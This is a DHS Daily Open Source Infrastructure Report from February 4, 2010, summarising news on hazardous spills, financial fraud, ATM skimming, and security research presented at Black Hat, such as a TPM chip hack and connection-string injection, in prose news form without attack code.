Department of Homeland Security Daily Open Source Infrastructure Report

Thursday, February 4, 2010

Complete DHS Daily Report for February 4, 2010

Daily Report

Top Stories

 According to the Columbus Dispatch, all eastbound and westbound lanes along a 4-mile stretch of I-70 in Madison County, Ohio were closed for about an hour Tuesday evening after a 6,900 gallon tanker leaked about 100 gallons of acetone. (See item 7)

7. February 3, Columbus Dispatch – (Ohio) Tanker leak closes I-70 in Madison County. All eastbound and westbound lanes along a 4-mile stretch of I-70 in Madison County were closed for about an hour the evening of February 2 after a tanker was discovered to be leaking a hazardous chemical. The Madison County sheriff’s office reported at 8:30 p.m. that a 6,900 gallon tanker was leaking acetone in the westbound lane at mile post 83 between the exits for Rts. 29 and 142. The eastbound lanes were reopened at 9:30 p.m., and all but one westbound lane was opened by 10:25 p.m. About 100 gallons of acetone spilled, a State Highway Patrol dispatcher said. Acetone is a colorless flammable solvent that is used in products from paint thinner to nail polish remover. There was no accident and no injuries reported. A number of area fire departments, a hazardous material unit and the Ohio Environmental Protection Agency responded. Source:

 The Galveston Daily News reports that the U.S. Coast Guard is investigating an incident last week in which Carnival Cruise Line’s Ecstasy struck the passenger gangway at the Texas Cruise Ship Terminal at Pier 25, knocking the $1.8 million structure out of commission, possibly for weeks. (See item 30)

30. February 2, Galveston Daily News – (Texas) Cruise ship damages gangway. The

U.S. Coast Guard is investigating an incident last week in which Carnival Cruise Line’s Ecstasy struck the passenger gangway at the Texas Cruise Ship Terminal at Pier 25, knocking the $1.8 million structure out of commission, possibly for weeks. No one was injured in the collision, which occurred about 8 a.m. Thursday as the ship’s captain was attempting to turn the 855-foot Ecstasy around in the channel, port officials said. “While turning around in the channel, the rear of the ship nudged the gangway and pushed it about 15 feet along the wharf and about 3 feet toward the terminal — but not into the terminal,” the Port Director said. The Coast Guard has ruled out drug and alcohol use as the cause of the crash, but it had not completed its investigation nor determined the cause of the accident, a spokesman said. Source:


Banking and Finance Sector

21. February 3, Bloomberg – (International) Explosion at Darwin insurance office injures 15. Fifteen people were admitted to the hospital in the northern Australian city of Darwin Wednesday after an explosion at an insurance office, officials said. A man is in custody and the major crimes unit is probing the blast at the Territory Insurance Office, Northern Territory police said. A “disgruntled claimant” was behind the attack, wheeling a shopping trolley containing three jerry cans and fireworks into the office, the Australian Broadcasting Corp. reported. “This is not a terrorist incident,” the broadcaster cited a commander as saying. Four people were in a serious though stable condition after being treated for burns and respiratory problems caused by smoke inhalation, a spokeswoman for Royal Darwin Hospital said in a telephone interview. The rest were stable and expected to be discharged later today. Six staff members were among those injured, TIO’s chief executive said in an e-mailed statement. Police “believe this is an isolated incident and there is no ongoing threat to TIO, its staff or its customers,” the chief executive said. Nevertheless, security has been stepped up “at all our offices and branches.” TIO is Australia’s only government-owned commercial and financial services provider. Source:

22. February 3, ComputerWorld – (International) Old security flaws still a major cause of breaches, says report. An overemphasis on tackling new and emerging security threats may be causing companies to overlook older but far more frequently exploited vulnerabilities, according to a recent report. The report, from Trustwave, is based on an analysis of data gathered from more than 1,900 penetration tests and over 200 data breach investigations conducted on behalf of clients such as American Express, MasterCard, Discover, Visa and several large retailers. The analysis shows that major global companies are employing “vulnerability chasers” and searching out the latest vulnerabilities and zero-day threats while overlooking the most common ones, the report said. As a result, companies continue to be felled by old and supposedly well-understood vulnerabilities rather than by newfangled attack tools and methods. For instance, the top three ways hackers gained initial access to corporate networks in 2009 were via remote access applications, trusted internal network connections and SQL injection attacks, Trustwave found. The most common vulnerability that Trustwave discovered during its external network penetration tests involved the management interfaces for Web application engines such as WebSphere and ColdFusion. In many cases, the management interfaces were accessible directly from the Internet and had little or no password protection, potentially allowing attackers to deploy their own malicious applications on the Web server. Source:

23. February 3, NBC Connecticut – (Connecticut) Local bank hit by second multi-million scheme. Just weeks after a trio, including a husband, his wife and her ex-hubby, were arrested and accused of trying bilking Webster Bank out of more than $6 million, the troubles for the Waterbury-based bank have escalated and might be $11 million dollars worse. On February 2, the company released a statement about “elaborate embezzlement scheme” at a subcontractor that provides bulk cash processing on behalf of one of the bank’s major vendors. No customers were affected, according to the bank. The subcontractor has paid back some of the money, according to the bank, and has insurance to cover the whole loss. This is the second multimillion dollar hit the local bank chain has suffered in recent years. Source:

24. February 3, New York Daily News – (New York) Auto insurance fraud on rise in New York State and motorists are paying the bill. Auto insurance fraud is beginning to soar in New York - and so are drivers’ rates. The Daily News has learned suspected fraud cases have jumped 33 percent since 2006. And this has hurt drivers in their wallets: Auto insurance rate hikes averaged 6.3 percent last year, the state says. Companies inundated the state Insurance Department with 13,433 complaints of suspected no-fault auto-insurance fraud last year - up from the 10,117 incidents flagged just three years earlier. The scams are pervasive in and around the city, particularly in the Bronx and Brooklyn, Insurance Department statistics and industry experts reveal. In many cases, experts say, accidents are staged and corrupt medical clinics submit fraudulent claims for treatment that was either not performed or medically needed. As fraud cases have risen, so have the average payouts per auto insurance injury claim. They have soared 55 percent since 2004 and are now more than double the national average. Source:

25. February 2, Forbes – (National) Cybercrime checks into the hotel industry. Over the past year America’s hotels have had some uninvited guests: a wave of increasingly sophisticated invasions by organized cybercriminals. That’s one finding of a report that a cybersecurity researcher plans to present on February 2 at the Black Hat security conference in Arlington, Virginia. His data shows a spike in hacking incidents that successfully targeted hotels and resorts, what the researcher describes as relatively unprotected sources of thousands or even millions of credit card account details. The researcher, who works as a security auditor and data breach investigator for the security firm Trustwave, plans to outline the results of around 1,900 audits and 200 breach investigations that his company performed over the last year. The central anomaly in that data: While only 3% of the audits Trustwave performed proactively for companies were commissioned by the hospitality industry, hotels and resorts were victims in 38% of investigations following successful cybercriminal attacks. That’s a new phenomenon for Trustwave, whose hospitality breach investigations were “practically nonexistent” in 2008, the researcher said. He argues that rather than searching many industries for vulnerable targets, hackers are increasingly targeting specific sectors whose systems they know to be accessible and lucrative. “The hospitality industry was the flavor of the year for cybercrime,” the researcher said. “These companies have a lot of data, there are easy ways in and the intrusions can take a very long time to detect.” Source:

26. February 1, Reno Gazette-Journal – (Nevada) Police in Reno track growing number of ATM skimming attacks. The Reno Gazette-Journal reports that debit and credit cards in the area have been compromised and used for purchases totaling hundreds of dollars at stores in states as far away as Florida and Ohio. The compromised cards have been linked to ATM transactions, too. The paper says that dozens of Reno residents have reported being the victims of similar crimes over the last six months. The surge in reports prompted police to track the fraud. A detective with the Reno police Financial Crimes Unit says Eastern European organized crime groups have taken advantage of data breaches at financial institutions to clone credit and debit cards using computer software and cardstock with a magnetic strip. This week, police arrested a Bulgarian man in Massachusetts related to an international ATM-skimming ring that allegedly stole money from hundreds of accounts in the area. Skimming is a growing problem, in Reno and other parts of the United States. The U.S. Secret Service estimated an annual loss of $1 billion specifically from ATM skimming. Source:

Information Technology

56. February 3, Network World – (International) Black Hat: Researcher claims hack of chip used to secure computers, smartcards. A researcher with expertise in hacking hardware Tuesday detailed at the Black Hat DC conference how it’s possible to subvert the security of a processor used to protect computers, smartcards and even Microsoft’s Xbox 360 gaming system. A researcher at Flylogic Engineering said he has hacked an Infineon SLE 66 CL PC processor that is also used with Trusted Platform Module (TPM) chips. He emphasized that his research shows TPM, which was developed as an industry specification for hardware-based computer security by the Trusted Computing Group and has been implemented in hardware by Infineon and other manufacturers, is not as secure as presumed. TPM can be used for a wide variety of purposes, including storage of encryption keys and is used with Microsoft’s BitLocker encryption technology. The researcher’s method, as he described it, entailed jumping the wire into the internal circuitry of the Infineon chips to create a bypass into the core. The researcher acknowledged it took him six months to figure out how to effectively penetrate it, which required bypassing circuitry on chips he purchased inexpensively from Chinese manufacturers. Source:

57. February 3, The Register – (International) Warez backdoor allows hackers to pwn Twitter accounts. Twitter has lifted the lid on its recent advice to many users to reset their passwords for the micro-blogging site. Originally, it was thought that the guidance had come in response to a common or garden phishing attack. In a post on February 2, Twitter explained that the attack was actually far more devious and elaborate. Hackers established Torrent user sites and forums with hidden backdoors. They waited for these forums to grow in popularity before they harvested login details. These login credentials were then used in attempts to break into accounts on third party sites such as Twitter. The attack relied on the frequent mistake of using the same password and user ID combination for multiple sites. In other words, victims are using the same password/userID combo on warez forums and Twitter, a mistake that left them open to attack because unidentified hackers had backdoor access to these forums. Twitter detected the attack after it became suspicious of a “sudden surge in followers” to two previously obscure accounts last week. Followers of these accounts were advised to change their passwords over concerns that hackers involved in the attack had compromised their accounts to, in order to gain more followers on Twitter. It is unclear how many profiles were taken control of by the attacks or what other sites might have been involved. All might have been prevented via the use of rudimentary password security precautions. Source:

58. February 3, The Register – (International) Stubborn trojan stashes install file in Windows help. Security researchers have spied malware that stashes a copy of itself in a Windows help file to ensure victim computers remain infected. The trojan, dubbed Muster.e by anti-virus provider McAfee, infects a Windows file called imepaden.hlp so it stores the main components of the malware in encrypted form. In the event the installed malware is removed, the secret payload is decrypted into an executable file called upgraderUI.exe and run by a companion installation file that automatically runs as a Windows service. “This is hiding in plain sight,” said a threat researcher at McAfee Labs. “The help file trick is pretty new to us. Usually on the client, we don’t see this very often.” The technique ensures Muster.e remains installed on an infected PC even if most of the files associated with the malware are removed. No doubt it has also perplexed its share of users who can not figure out how their PCs keep getting reinfected. Source:

59. February 2, PC World – (International) Apple iPhone, iPod touch security patch: what’s fixed. Apple on February 2 released an updated version of its iPhone OS software for the iPhone and iPod touch. The new version 3.1.3 patches several security holes, provides a few bug fixes and minor enhancements, and is available via iTunes download. The five security fixes are related to CoreAudio, ImageIO, Recovery Mode, and WebKit. The CoreAudio patch prevents “maliciously crafted” MP4 audio files from wreaking havoc, such as terminating programs or running rogue code. The ImageIO fix blocks malicious TIFF images from performing similar voodoo when users view them. The Recovery Mode update prevents someone with physical access to a locked iPhone or iPod touch from bypassing the passcode and accessing your data. It corrects a memory corruption glitch in the handling of a USB control message that allowed the security breach. WebKit gets two patches. One corrects an HTML 5-related problem that may cause mail to load remote audio and video files when remote image-loading is turned off. The second blocks WebKit from accessing a malicious FTP server. Source:

60. February 2, Information Week – (International) Homeland Security plans cybersecurity, data center investments. The Department of Homeland Security is looking to invest nearly $900 million in fiscal 2011 on technology projects that include bolstering cybersecurity and continued work on a data center consolidation project that’s already underway. Other IT priorities listed as part of the department’s proposed $56.3 billion budget, unveiled on February 1, include improvements to an existing Internet-based verification program that lets employers check that someone is legally allowed to work in the United States and technology for airport security. DHS is asking for $379 million to go to its National Cyber Security Division (NCSD) to develop capabilities for preventing and responding to cyber attacks. The department plans to use the money to identify and reduce vulnerabilities within both its .gov and .com Internet domains, officials said on a conference call. NCSD is a division within DHS that’s meant to work collaboratively with public, private, and international organizations to secure cyberspace and the U.S. government’s cyber infrastructure. At the same time that it’s investing in cybersecurity, the U.S. President’s administration has made several key appointments to oversee such efforts. Homeland Security is requesting $192.2 million in its FY 2011 budget to continue migrating applications and systems from 24 data centers to two enterprise-wide data centers. The project was started after its inspector general, in 2005, reported deficiencies in the department’s IT disaster-recovery planning. Source:

61. February 2, DarkReading – (International) Black Hat DC: Researchers reveal connection string ‘Pollution’ attack. A pair of Spanish researchers today demonstrated a way to hack the connection between a Web application and a database, letting the attacker hijack Web credentials and perform other nefarious activities. The so-called Connection String Parameter Pollution (CSPP) attack exploits poorly secured dynamic connections between Web apps and databases, namely ones that still use semicolons as separators between data such as the data source, user ID, and password associated with a connection to the database, for instance. “If an attacker pollutes the parameter she will have full control of the connection string and can overwrite anything in it,” says a researcher with Informatica 64, who along with a colleague demonstrated the CSPP attack. The two say CSPP lets an attacker steal hashes and scan ports on a server as well. They also released a tool today called CSPP Scanner that allows organizations to test whether they are vulnerable to this form of attack. CSPP basically injects or pollutes connection strings between the Web application authenticating a user to the database, for example, by injecting phony parameters into the connection strings using semicolons as separators, which allows the attacker to take over the application and the way it is authenticated, the researchers say. This type of attack is easy to execute, they say, and thus likely to be exploited. Source:

62. February 2, IDG News Services – (National) Senator questions tech companies on China activities. A U.S. senator is seeking information from 30 technology companies in advance of a hearing he is planning on their human rights practices in China. The move comes in response to Google’s recently announced plans to stop censoring search results in China after discovering that its systems had been broken into by hackers based in China. Google discovered that not only had some of its intellectual property been stolen, but the Gmail accounts of activists supporting human rights in China had also been compromised. The senator asks the companies to detail their businesses in China and what measures, if any, they will implement to ensure that their products and services do not facilitate human rights abuses by the Chinese government. He also urges them to sign on to a code of conduct outlined by the Global Network Initiative. Companies that did not respond at all to the senator’s original letter and that have now been sent new letters include Twitter, Toshiba, Acer and Juniper. Others that did respond to the letter last year but were questioned again in the new letter include Apple, AT&T, Cisco, Dell, eBay, Facebook, Hewlett-Packard, McAfee, News Corp., Nokia, Skype, Sprint Nextel, Verizon, Vodafone and Websense. Amazon, IAC, IBM, Oracle, Research In Motion and SAP were questioned for the first time. Source:

63. February 2, Infosecurity – (International) Attack fools iPhone into trusting fake certificates. An anonymous researcher has posted a proof-of-concept attack that fakes a trusted root certificate on the iPhone. Researchers have confirmed that the attack works, making it possible for anyone to create a web page that is deemed to be trusted by Apple. While not allowing for remote code execution, the fake certificate flaw could enable many other attacks on an iPhone. “By setting a new HTTP proxy, it is possible to re-direct all HTTP traffic from the iPhone to an arbitrary server on the net. Modifying root certificates makes it possible to act as man-in-the-middle to hijack SSL (HTTPS) connections too,” the researcher said. “Obnoxious modifications can be brought to the phone like prohibiting the use of Safari, mail and other apps, or adding extra VPN, WiFi or email settings.” The server providing the certificate to an iPhone issues a file requesting the iPhone’s credentials. The file is called a mobileconfig file, which is used by the iPhone to issue a request to a provisioning server. The iPhone uses an Apple-signed certificate to sign its own credentials when making a request, which requires a chain of trust to be established up to the root CA. The researchers jailbroke an iPhone to gain access to this root of trust, and found that the self-signed root certificate used by Apple is not the same as the one published on Apple’s website – even though the key ID is the same. Source:

For another story, see item 65 below in the Communications Sector

Communications Sector

64. February 2, Grand Rapids Press – (Michigan) WZZM TV-13 boosts transmission, helping antenna problems. WZZM 13, a Gannett-owned ABC affiliate, announced on February 2 it will be increasing its transmission power by 50 percent, which may solve antenna-users’ reported problems of not being able to receive the station since the transition to digital (DTV) in June. Work to increase the station’s power will run 1-3 a.m. on February 3. WZZM will not be broadcasting during this time. The process also impacts DIRECTV users and some cable systems. Although, remaining users should receive the station. Source:

65. February 1, – (International) US branded dirtiest web hosting nation. Experts at security firm Sophos have branded the US as the “dirty man of the

web world” after new research from the vendor identified the country as the top host of infected sites. Over a third of the world’s infected sites are hosted in the US, ahead of Russia with 12.8 percent and China with 11.2 percent, according to the Sophos Security Threat Report 2010. The UK came tenth with 1.6 percent. The report covers malicious sites deliberately set up to lure victims with “ promises of desirable or salacious content”, and the more recent trend of infecting legitimate sites with malware via SQL injection or other attacks, Sophos’ senior technology consultant said. Source: